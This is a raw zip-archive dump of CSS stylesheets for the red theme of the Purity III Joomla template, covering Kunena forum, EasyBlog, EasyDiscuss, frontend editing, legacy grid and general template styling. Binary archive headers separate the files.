#kunena.layout .tab-content tfoot .input-group-btn {
  text-align: right;
}
#kunena.layout .tab-content tfoot .input-group-btn select {
  float: none;
  margin-right: 5px !important;
}
.view-topic #kunena.layout > h1 {
  font-size: 16px;
}
.view-topic #kunena.layout > h1 .fa {
  font-size: 16px;
}
.view-topic #kunena.layout .message {
  border: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div {
  padding: 20px 0;
}
.view-topic #kunena.layout .message > div.col-md-2 {
  border-right: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div.col-md-10 {
  border-left: 1px solid #eeeeee;
  margin-left: -1px;
  padding-left: 20px;
  padding-right: 20px;
}
.view-topic #kunena.layout .message .modal {
  z-index: 100000;
}
.view-topic #kunena.layout .message .modal .modal-header h4 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .message-published {
  border: 0;
  box-shadow: none;
  padding: 0;
  min-height: 0;
}
.view-topic #kunena.layout .message .message-published::after {
  display: none;
}
.view-topic #kunena.layout .message .message-published .pull-right.text-muted {
  display: block;
  float: none !important;
  text-align: right;
  margin-top: 10px;
}
.view-topic #kunena.layout .message .kmsg {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
}
.view-topic #kunena.layout .message .kattach .thumbnails {
  padding: 0;
  margin: 0;
}
.view-topic #kunena.layout .message .kattach .thumbnails:before,
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  content: " ";
  display: table;
}
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  clear: both;
}
.view-topic #kunena.layout .message .kattach .thumbnails li {
  width: auto;
}
.view-topic #kunena.layout .message .kattach .thumbnails .btn-default {
  border: 0;
  padding: 0;
}
.view-topic #kunena.layout .message .col-md-2 {
  padding-left: 10px;
  padding-right: 10px;
}
.view-topic #kunena.layout .message .col-md-2 .topic-starter {
  border: 0;
}
.view-topic #kunena.layout .message .col-md-2 .profilebox li {
  display: block;
  margin-bottom: 6.66666667px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand .btn-default {
  background: transparent;
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand ul li {
  margin-top: 6.66666667px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default {
  padding: 20px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body {
  border: 0;
  padding-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header {
  padding: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header h3 {
  margin-top: 0;
}
.view-user #kunena.layout h1 {
  margin-top: 0;
}
.view-user #kunena.layout .container {
  background: #f7f7f7;
  clear: both;
  padding-bottom: 20px;
  padding-top: 20px;
}
.view-user #kunena.layout .nav-tabs {
  border-bottom: 0;
  margin-bottom: 20px;
}
.view-user #kunena.layout .nav-tabs > li {
  margin-right: 5px;
  margin-bottom: 3.33333333px;
}
.view-user #kunena.layout .nav-tabs > li a {
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
  font-weight: 500;
  text-transform: uppercase;
  padding: 5px 10px;
}
.view-user #kunena.layout .nav-tabs > li a:hover,
.view-user #kunena.layout .nav-tabs > li a:focus,
.view-user #kunena.layout .nav-tabs > li a:active {
  border-color: #cc0000;
  color: #cc0000;
}
.view-user #kunena.layout .nav-tabs > li.active a {
  background: #cc0000;
  border-color: #cc0000;
  color: #ffffff;
}
#kunena.layout .jssocials-share-link {
  box-shadow: none;
  font-size: 10px;
  padding: 4px 6px;
}
#kunena.layout .breadcrumb {
  background-color: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px 10px;
}
#kunena.layout .breadcrumb .divider {
  display: none;
}
#kunena.layout ul.pagination {
  border: 1px solid #eeeeee;
  margin: 0 0 20px;
}
#kunena.layout ul.pagination:before,
#kunena.layout ul.pagination:after {
  content: " ";
  display: table;
}
#kunena.layout ul.pagination:after {
  clear: both;
}
#kunena.layout ul.pagination li {
  display: block;
  float: left;
}
#kunena.layout ul.pagination li + li {
  border-left: 1px solid #eeeeee;
}
#kunena.layout ul.pagination li a {
  border: 0;
  display: inline-block;
  float: none;
  font-size: 14px;
  font-weight: 400;
  margin: -1px;
  padding: 5px 15px;
}
#kunena.layout ul.pagination li a.disabled {
  opacity: 0.4;
  filter: alpha(opacity=40);
}
input#ksearch-keywords {
  width: 100%;
}
.klatest .klatest-items li {
  border: 0;
}
.klatest .klatest-items .klatest-item {
  margin-top: 10px;
}
.klatest .klatest-items .klatest-item .klatest-subject {
  padding-top: 0;
}
div.kstats-module ul.kstats-items li {
  padding: 10px;
}
#kunena.layout #kuserlist-form .label {
  border-radius: 3px;
}
#kunena.layout #kuserlist-form .label.label-default,
#kunena.layout #kuserlist-form .label.label-success,
#kunena.layout #kuserlist-form .label.label-warning,
#kunena.layout #kuserlist-form .label.label-error {
  color: #ffffff;
}
#kunena.layout #adminForm table.table {
  margin-top: 20px;
}
#kunena.layout .input-group-btn .btn {
  margin-left: 10px;
  min-height: 20px;
  line-height: 20px;
}
#kunena.layout #ann-date .input-group-addon,
#kunena.layout #ann-date2 .input-group-addon,
#kunena.layout #ann-date3 .input-group-addon {
  display: inline-block;
  height: 34px;
  line-height: 24px;
}
.com_kunena .datepicker-dropdown {
  background: #ffffff;
  border-color: #d5d5d5;
  padding: 10px;
}PKԜ�\BL���:purity_iii/local/css/themes/red/extras/com_easydiscuss.cssnu&1i�#discuss-wrapper .nav-collapse.collapse {
  display: block;
}
#discuss-wrapper .nav-collapse.collapse .modal-body .row-fluid {
  margin-left: 0;
  margin-right: 0;
}PKԜ�\�y���7purity_iii/local/css/themes/red/extras/com_easyblog.cssnu&1i�#eblog-wrapper .btn-eb-navbar {
  height: 30px;
  width: 44px;
}
#eblog-wrapper #eblog-search .search-input input {
  height: 30px !important;
}
.ezb-mod.mod_easyblogcategories .mod-item {
  padding-top: 20px !important;
}
div#fd.eb .eb-post + .eb-post {
  border-top: 1px solid #eeeeee;
  padding-top: 40px;
}
.mod-es-recent-blogs .es-nav-blogs {
  margin: 0;
  padding: 0;
}
.mod-es-recent-blogs .es-nav-blogs li {
  list-style-type: none;
}
.mod-es-recent-blogs .es-nav-blogs li .media-object {
  margin-bottom: 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media {
  padding: 0 !important;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object {
  float: none !important;
  padding: 0;
  margin: 0 0 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object img {
  max-width: 100%;
}
.mod-easyblogtagcloud .tag-cloud {
  margin: 0 10px 5px 0;
  display: inline-block;
  line-height: normal !important;
}PKԜ�\y֦Jl+l+1purity_iii/local/css/themes/red/frontend-edit.cssnu&1i�.com_config #templates-form .tip {
  background: #f5f5f5;
  padding: 12px 12px;
}
.com_config #templates-form textarea {
  height: auto;
  width: auto;
  min-height: 100px;
  min-width: 50%;
}
.com_config #templates-form .input-append .add-on,
.com_config #templates-form .input-prepend .add-on {
  width: 35px;
}
.com_config #templates-form .input-append input,
.com_config #templates-form .input-prepend input {
  display: inline-block;
}
.com_config #templates-form .input-append .btn,
.com_config #templates-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #templates-form .t3-admin-form-legend {
  display: none;
}
.com_config #templates-form .row-fluid .span6 {
  width: 100%;
}
@media (min-width: 768px) {
  .com_config #templates-form .control-group .control-label {
    width: 250px;
  }
  .com_config #templates-form .control-group .controls {
    margin-left: 280px;
  }
}
.com_config #modules-form .input-append .add-on,
.com_config #modules-form .input-prepend .add-on {
  width: 35px;
}
.com_config #modules-form .input-append input,
.com_config #modules-form .input-prepend input {
  display: inline-block;
}
.com_config #modules-form .input-append .btn,
.com_config #modules-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #modules-form .accordion-group {
  margin-bottom: 20px;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle {
  border: 1px solid #ddd;
  border-radius: 5px 5px 0 0;
  color: #428bca;
  display: block;
  padding: 10px;
  outline: none;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle.collapsed {
  border-radius: 5px;
  color: #666;
}
.com_config #modules-form .accordion-group .accordion-body {
  border: 1px solid #ddd;
  border-top: 0;
  border-radius: 0 0 5px 5px;
  padding-top: 20px;
}
.com_config #modules-form .accordion-group .accordion-body .nav-tabs {
  border-bottom: 0;
}
.com_config #modules-form .radio input[type="radio"] {
  margin-left: 0;
  position: relative;
}
.com_config #modules-form .radio label {
  padding-left: 5px;
  padding-right: 20px;
}
.controls select {
  vertical-align: middle;
  width: 220px;
}
@media (min-width: 768px) {
  .edit .inputbox,
  .edit input[type="text"],
  .edit select.inputbox,
  .edit select {
    width: 250px;
  }
}
.edit textarea {
  width: 100%;
}
.edit .input-append,
.edit .input-prepend {
  display: block;
  width: auto;
}
@media (min-width: 768px) {
  .edit .input-append input[type="text"],
  .edit .input-prepend input[type="text"],
  .edit .input-append input.inputbox,
  .edit .input-prepend input.inputbox {
    display: inline-block;
    width: 210px;
  }
}
.edit .input-append .btn,
.edit .input-prepend .btn {
  border: 1px solid #cccccc;
  background-color: #ffffff;
}
.edit .nav-tabs {
  margin-bottom: 20px;
}
.edit .tab-pane:before,
.edit .tab-pane:after {
  content: " ";
  display: table;
}
.edit .tab-pane:after {
  clear: both;
}
#editor-xtd-buttons,
.toggle-editor {
  margin-top: 20px;
  margin-bottom: 20px;
}
#editor-xtd-buttons .btn,
.toggle-editor .btn {
  background-color: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
}
#editor-xtd-buttons {
  margin-right: 30px;
}
#sbox-window {
  padding: 0;
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
}
.btn.jmodedit {
  padding: 0;
}
.btn.jmodedit:focus,
.btn.jmodedit:active {
  box-shadow: none;
}
.jfedit-menu + .tooltip {
  min-width: 100px;
}
.window form table {
  border: 1px solid #dddddd;
  background: #f9f9f9;
  margin-bottom: 20px;
}
.window form table td {
  padding: 8px;
}
.window form .help-block {
  font-size: 12px;
  clear: both;
  padding-top: 5px;
}
.window.view-modules .well .control-label {
  display: inline-block;
}
.window.view-modules .well .controls {
  display: inline-block;
  vertical-align: middle;
  margin-left: 10px;
}
.window.view-modules .control-group:after {
  content: "";
  clear: both;
  display: table;
}
.window.view-modules #filter-bar {
  margin-bottom: 10px;
}
.window.view-modules #filter-bar .btn-group button {
  margin-top: 0;
}
.window #imageForm {
  margin: 0;
  width: auto;
}
.window #imageForm .chzn-container {
  float: left;
}
.window #imageForm #upbutton {
  border: 1px solid #cccccc;
  float: left;
  padding: 3px 12px;
  margin-left: 5px;
}
.window #imageForm .pull-right {
  margin-right: 30px;
}
.window #imageForm .well:after {
  display: table;
  content: "";
  clear: both;
}
.window #uploadForm {
  width: auto;
}
.window #uploadForm #upload-file {
  margin: 10px 0;
}
.window .manager {
  margin: 0;
  padding: 0;
}
.window .manager:before,
.window .manager:after {
  content: " ";
  display: table;
}
.window .manager:after {
  clear: both;
}
.window .manager .thumbnail {
  float: left;
  margin-right: 10px;
  margin-left: 10px;
}
.window.view-articles .filter {
  overflow: visible;
}
.window.view-articles .filter .btn-toolbar .icon-remove,
.window.view-articles .filter .btn-toolbar .icon-search {
  margin-right: 5px;
}
.window.view-articles .filters {
  float: none !important;
}
.window.view-articles .filters .chzn-container {
  display: inline-block;
}
.window.view-articles .filters .chzn-drop input {
  float: none;
}
.t3onoff {
  border: 1px solid #aaa;
  border-radius: 0;
  display: block;
  height: 30px;
  overflow: hidden;
  padding: 0;
  position: relative;
  white-space: nowrap;
  width: 90px;
  
  
  
  
  
}
.t3onoff input[type=radio] {
  display: none;
}
.t3onoff label {
  width: 90px;
  height: 30px;
  overflow: hidden;
  display: block;
  border-radius: 0;
  position: absolute;
  top: -1px;
  left: -1px;
  z-index: 1;
  text-transform: uppercase;
  background: url(../../../../../../plugins/system/t3/base-bs3/imgs/blank.gif) no-repeat transparent;
  text-indent: -999em;
}
.t3onoff label:before,
.t3onoff label:after {
  display: block;
  position: absolute;
  top: 0;
  border-radius: 0;
  -webkit-transition: all 250ms;
  -o-transition: all 250ms;
  transition: all 250ms;
}
.t3onoff label:before {
  content: "ON";
  width: 100%;
  height: 100%;
  text-indent: 0;
  color: white;
  padding: 4px 18px;
  font-weight: normal;
}
.t3onoff label:after {
  content: "";
  width: 40%;
  height: 100%;
  background: #fff;
}
.t3onoff label.off:before {
  content: "OFF";
  text-align: right;
  color: #555;
}
.t3onoff label.active {
  z-index: 0;
}
.t3onoff label.off:before {
  background: #eee;
  left: 100%;
}
.t3onoff label.off.active:before {
  left: 0%;
}
.t3onoff label.on:before {
  background: #690;
  left: -100%;
}
.t3onoff label.on.active:before {
  left: -0%;
}
.t3onoff label.off:after {
  left: 60%;
}
.t3onoff label.off.active:after {
  left: 0%;
}
.t3onoff label.on:after {
  left: 0%;
}
.t3onoff label.on.active:after {
  left: 60%;
}

fieldset.radio.btn-group {
  padding: 0;
}
fieldset.radio.btn-group input {
  display: none;
}
fieldset.radio.btn-group label {
  display: inline-block;
  min-width: 54px;
  padding: 0 12px;
  border: 1px solid #aaa;
  line-height: 28px;
  background: #eee;
  color: #555;
  border-radius: 0;
  text-align: center;
  border-right-width: 0px;
  text-transform: uppercase;
}
fieldset.radio.btn-group label:last-child {
  border-right-width: 1px;
}
fieldset.radio.btn-group label.active {
  background: #690;
  border-color: #5c8b00;
  color: #fff;
}
.window.view-modules .js-stools,
.window.view-articles .js-stools,
.window.view-contacts .js-stools {
  margin-bottom: 20px;
}
.window.view-modules .js-stools .btn,
.window.view-articles .js-stools .btn,
.window.view-contacts .js-stools .btn {
  border: 1px solid #ccc;
  margin-top: 0;
}
.window.view-modules .js-stools .input-append .btn,
.window.view-articles .js-stools .input-append .btn,
.window.view-contacts .js-stools .input-append .btn {
  border-left: 0;
}
.window.view-modules .js-stools input,
.window.view-articles .js-stools input,
.window.view-contacts .js-stools input {
  display: inline-block;
}
.window.view-modules .js-stools-container-filters .chzn-container-single,
.window.view-articles .js-stools-container-filters .chzn-container-single,
.window.view-contacts .js-stools-container-filters .chzn-container-single {
  width: 220px !important;
}
.window.view-modules .js-stools-container-filters .chzn-drop,
.window.view-articles .js-stools-container-filters .chzn-drop,
.window.view-contacts .js-stools-container-filters .chzn-drop {
  box-sizing: border-box !important;
}
.window.view-modules table#moduleList td .label,
.window.view-articles table#moduleList td .label,
.window.view-contacts table#moduleList td .label {
  background-color: #999;
  box-sizing: border-box;
  border-radius: 3px;
  display: inline-block;
  font-weight: normal;
  font-size: 100%;
  padding: 10px;
  width: 100%;
}
.window.view-modules table#moduleList td:nth-child(1),
.window.view-articles table#moduleList td:nth-child(1),
.window.view-contacts table#moduleList td:nth-child(1) {
  vertical-align: middle;
}
.window.view-modules .icon-publish:before,
.window.view-articles .icon-publish:before,
.window.view-contacts .icon-publish:before {
  content: "\f00c";
  font-size: 16px;
}
.icon-eye-open:before,
.icon-eye:before {
  content: "\f06e";
  font-family: "FontAwesome";
}
.icon-file-add:before {
  content: "\f0f6";
  font-family: "FontAwesome";
}
.icon-cancel:before {
  content: "\f00d";
  font-family: "FontAwesome";
}
.icon-publish:before {
  content: "\f00c";
}
.icon-unpublish:before {
  content: "\f00d";
}
.icon-featured:before {
  content: "\f005";
}
.icon-unfeatured:before {
  content: "\f005";
}
.button2-left,
.button2-left div {
  float: left;
}
.button2-right,
.button2-right div {
  float: right;
}
.button2-left {
  margin: 5px 5px 0 0;
}
.button2-right {
  margin: 5px 0 0 5px;
}
.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
  background: #eeeeee;
  border: 1px solid #e1e1e1;
  color: #999999;
  cursor: pointer;
  display: block;
  float: left;
  padding: 2px 10px;
  border-radius: 0px;
}
.button2-left span,
.button2-right span {
  color: #999999;
  cursor: default;
}
.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
  padding: 0 6px;
}
.button2-left a:hover,
.button2-right a:hover {
  background: #e1e1e1;
  color: #444444;
  text-decoration: none;
}
.edit.item-page a.modal,
.com_config form a.modal {
  display: inline-block;
  position: inherit;
  width: auto !important;
  top: auto !important;
  overflow: hidden;
}
.edit.item-page a.modal.btn,
.com_config form a.modal.btn {
  background: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
  overflow: hidden;
}
.controls img.calendar {
  cursor: pointer;
  margin-left: 5px;
}
.layout-pagebreak .form-horizontal .control-group .controls {
  margin-left: 0;
}
[class^="icon-"],
[class*=" icon-"] {
  font-family: FontAwesome3 !important;
}
.view-history .btn-group {
  margin-bottom: 10px;
}
.btn [class^="icon-"],
.btn [class*=" icon-"] {
  margin-right: 5px;
}
.btn span.icon-delete:before {
  content: "\f057";
  display: inline-block;
  height: 16px;
  width: 16px;
  color: #333;
}PKԜ�\a\��	�	/purity_iii/local/css/themes/red/legacy-grid.cssnu&1i�.row-fluid {
  margin-left: -15px;
  margin-right: -15px;
}
[class*="span"] {
  float: left;
}
.span1, .span2, .span3, .span4, .span5, .span6, .span7, .span8, .span9, .span10, .span11, .span12 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
.span12 {
  width: 100%;
}
.span11 {
  width: 91.66666667%;
}
.span10 {
  width: 83.33333333%;
}
.span9 {
  width: 75%;
}
.span8 {
  width: 66.66666667%;
}
.span7 {
  width: 58.33333333%;
}
.span6 {
  width: 50%;
}
.span5 {
  width: 41.66666667%;
}
.span4 {
  width: 33.33333333%;
}
.span3 {
  width: 25%;
}
.span2 {
  width: 16.66666667%;
}
.span1 {
  width: 8.33333333%;
}
.offset12 {
  margin-left: 100%;
}
.offset11 {
  margin-left: 91.66666667%;
}
.offset10 {
  margin-left: 83.33333333%;
}
.offset9 {
  margin-left: 75%;
}
.offset8 {
  margin-left: 66.66666667%;
}
.offset7 {
  margin-left: 58.33333333%;
}
.offset6 {
  margin-left: 50%;
}
.offset5 {
  margin-left: 41.66666667%;
}
.offset4 {
  margin-left: 33.33333333%;
}
.offset3 {
  margin-left: 25%;
}
.offset2 {
  margin-left: 16.66666667%;
}
.offset1 {
  margin-left: 8.33333333%;
}
.offset0 {
  margin-left: 0%;
}
.visible-phone {
  display: none !important;
}
.visible-tablet {
  display: none !important;
}
.hidden-desktop {
  display: none !important;
}
.visible-desktop {
  display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-tablet {
    display: inherit !important;
  }
  .hidden-tablet {
    display: none !important;
  }
}
@media (max-width: 767px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-phone {
    display: inherit !important;
  }
  .hidden-phone {
    display: none !important;
  }
}
.width-10 {
  width: 10px;
}
.width-20 {
  width: 20px;
}
.width-30 {
  width: 30px;
}
.width-40 {
  width: 40px;
}
.width-50 {
  width: 50px;
}
.width-60 {
  width: 60px;
}
.width-70 {
  width: 70px;
}
.width-80 {
  width: 80px;
}
.width-90 {
  width: 90px;
}
.width-100 {
  width: 100px;
}
.height-10 {
  height: 10px;
}
.height-20 {
  height: 20px;
}
.height-30 {
  height: 30px;
}
.height-40 {
  height: 40px;
}
.height-50 {
  height: 50px;
}
.height-60 {
  height: 60px;
}
.height-70 {
  height: 70px;
}
.height-80 {
  height: 80px;
}
.height-90 {
  height: 90px;
}
.height-100 {
  height: 100px;
}PKԜ�\�[��,purity_iii/local/css/themes/red/template.cssnu&1i�@media (max-width: 990px) {
  .always-show .mega > .mega-dropdown-menu,
  .always-show .dropdown-menu {
    display: block !important;
    position: static;
  }
  .open .dropdown-menu {
    display: block;
  }
}
.t3-logo,
.t3-logo-small {
  display: block;
  text-decoration: none;
  text-align: left;
  background-repeat: no-repeat;
  background-position: center;
}
.t3-logo {
  width: 182px;
  height: 50px;
}
.t3-logo-small {
  width: 60px;
  height: 30px;
}
.t3-logo,
.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-color.png");
}
.t3-logo-small,
.t3-logo-small.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-color.png");
}
.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-dark.png");
}
.t3-logo-small.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-dark.png");
}
.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-light.png");
}
.t3-logo-small.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-light.png");
}
@media (max-width: 990px) {
  .logo-control .logo-img-sm {
    display: block;
  }
  .logo-control .logo-img {
    display: none;
  }
}
@media (min-width: 991px) {
  .logo-control .logo-img-sm {
    display: none;
  }
  .logo-control .logo-img {
    display: block;
  }
}
#community-wrap .collapse {
  position: relative;
  height: 0;
  overflow: hidden;
  display: block;
}
.body-data-holder:before {
  display: none;
  content: "grid-float-breakpoint:991px screen-xs:480px screen-sm:768px screen-md:992px screen-lg:1200px";
}

body {
  padding-top: 55px;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #cc0000;
  text-decoration: none;
  outline: none;
  -webkit-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
}
a:hover,
a:focus {
  color: #800000;
  text-decoration: underline;
}
a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
img {
  vertical-align: middle;
}
th,
td {
  line-height: 1.42857143;
  text-align: left;
  vertical-align: top;
}
th {
  font-weight: bold;
}
td,
tr td {
  border-top: 1px solid #dddddd;
}
.cat-list-row0:hover,
.cat-list-row1:hover {
  background: #f5f5f5;
}
.cat-list-row1,
tr.cat-list-row1 td {
  background: #f9f9f9;
}
table.contentpane,
table.tablelist,
table.category,
table.admintable,
table.blog {
  width: 100%;
}
table.contentpaneopen {
  border: 0;
}
.star {
  color: #ffcc00;
}
.red {
  color: #cc0000;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.wrap {
  width: auto;
  clear: both;
}
.center,
.table td.center,
.table th.center {
  text-align: center;
}
.element-invisible {
  position: absolute;
  padding: 0;
  margin: 0;
  border: 0;
  height: 1px;
  width: 1px;
  overflow: hidden;
}

p {
  margin: 0 0 10px;
}
.lead {
  margin-bottom: 20px;
  font-size: 16px;
  font-weight: 200;
  line-height: 1.4;
}
@media (min-width: 992px) {
  .lead {
    font-size: 18px;
  }
}
small,
.small {
  font-size: 85%;
}
cite {
  font-style: normal;
}
.text-muted {
  color: #999999;
}
.text-primary {
  color: #cc0000;
}
.text-warning {
  color: #c09853;
}
.text-danger {
  color: #b94a48;
}
.text-success {
  color: #468847;
}
.text-info {
  color: #3a87ad;
}
.text-left {
  text-align: left;
}
.text-right {
  text-align: right;
}
.text-center {
  text-align: center;
}
.text-justify {
  text-align: justify;
}
.text-center .item-image img {
  margin: 0 auto;
}
.inline {
  display: inline-block;
}
.inline + .inline {
  margin-left: 20px;
}
.highlight {
  background-color: #FFC;
  font-weight: bold;
  padding: 1px 4px;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
  color: inherit;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-weight: 500;
  line-height: 1.1;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small {
  font-weight: normal;
  line-height: 1;
  color: #999999;
}
h1,
h2,
h3 {
  margin-top: 20px;
  margin-bottom: 10px;
}
h4,
h5,
h6 {
  margin-top: 10px;
  margin-bottom: 10px;
}
h1,
.h1 {
  font-size: 42px;
}
h2,
.h2 {
  font-size: 35px;
}
h3,
.h3 {
  font-size: 24px;
}
h4,
.h4 {
  font-size: 18px;
}
h5,
.h5 {
  font-size: 14px;
}
h6,
.h6 {
  font-size: 12px;
}
h1 small,
.h1 small {
  font-size: 24px;
}
h2 small,
.h2 small {
  font-size: 18px;
}
h3 small,
.h3 small,
h4 small,
.h4 small {
  font-size: 14px;
}
ul,
ol {
  margin-top: 0;
  margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
  margin-bottom: 0;
}
.list-unstyled {
  padding-left: 0;
  list-style: none;
}
.list-inline {
  padding-left: 0;
  list-style: none;
}
.list-inline > li {
  display: inline-block;
  padding-left: 5px;
  padding-right: 5px;
}
dl {
  margin-bottom: 20px;
}
dt,
dd {
  line-height: 1.42857143;
}
dt {
  font-weight: bold;
}
dd {
  margin-left: 0;
}
@media (min-width: 991px) {
  .dl-horizontal dt {
    float: left;
    width: 160px;
    clear: left;
    text-align: right;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
  }
  .dl-horizontal dd {
    margin-left: 180px;
  }
  .dl-horizontal dd:before,
  .dl-horizontal dd:after {
    content: " ";
    display: table;
  }
  .dl-horizontal dd:after {
    clear: both;
  }
}
abbr[title],
abbr[data-original-title] {
  cursor: help;
  border-bottom: 1px dotted #999999;
}
abbr.initialism {
  font-size: 90%;
  text-transform: uppercase;
}
blockquote {
  padding: 10px 20px;
  margin: 0 0 20px;
  border-left: 5px solid #eeeeee;
}
blockquote p {
  font-size: 17.5px;
  font-weight: 300;
  line-height: 1.5;
}
blockquote p:last-child {
  margin-bottom: 0;
}
blockquote small {
  display: block;
  line-height: 1.42857143;
  color: #999999;
}
blockquote small:before {
  content: '\2014 \00A0';
}
blockquote.pull-right {
  padding-right: 15px;
  padding-left: 0;
  border-right: 5px solid #eeeeee;
  border-left: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
  text-align: right;
}
blockquote.pull-right small:before {
  content: '';
}
blockquote.pull-right small:after {
  content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
  content: "";
}
address {
  display: block;
  margin-bottom: 20px;
  font-style: normal;
  line-height: 1.42857143;
}
code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
.our-team {
  clear: both;
  overflow: hidden;
}

legend {
  padding-bottom: 10px;
  font-weight: 700;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
textarea.form-control {
  height: auto;
}
.form-group {
  margin-bottom: 20px;
}
.radio label,
.checkbox label {
  display: inline;
}
.form-control-static {
  margin-bottom: 0;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
  }
  .form-inline .form-control {
    display: inline-block;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    float: none;
  }
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .form-control-static {
  padding-top: 7px;
}
.btn-inverse {
  color: #ffffff;
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse:hover,
.btn-inverse:focus,
.btn-inverse.focus,
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #191919;
}
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  background-image: none;
}
.btn-inverse.disabled,
.btn-inverse[disabled],
fieldset[disabled] .btn-inverse,
.btn-inverse.disabled:hover,
.btn-inverse[disabled]:hover,
fieldset[disabled] .btn-inverse:hover,
.btn-inverse.disabled:focus,
.btn-inverse[disabled]:focus,
fieldset[disabled] .btn-inverse:focus,
.btn-inverse.disabled.focus,
.btn-inverse[disabled].focus,
fieldset[disabled] .btn-inverse.focus,
.btn-inverse.disabled:active,
.btn-inverse[disabled]:active,
fieldset[disabled] .btn-inverse:active,
.btn-inverse.disabled.active,
.btn-inverse[disabled].active,
fieldset[disabled] .btn-inverse.active {
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse .badge {
  color: #444444;
  background-color: #ffffff;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
.btn-actions .btn-lg {
  font-size: 18px;
  padding: 10px 20px;
  border-radius: 20px;
}
.btn-actions .btn + .btn {
  margin-left: 20px;
}
@media screen and (min-width: 768px) {
  .btn-actions .btn-lg {
    font-size: 24px;
    padding: 10px 30px;
    border-radius: 30px;
  }
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
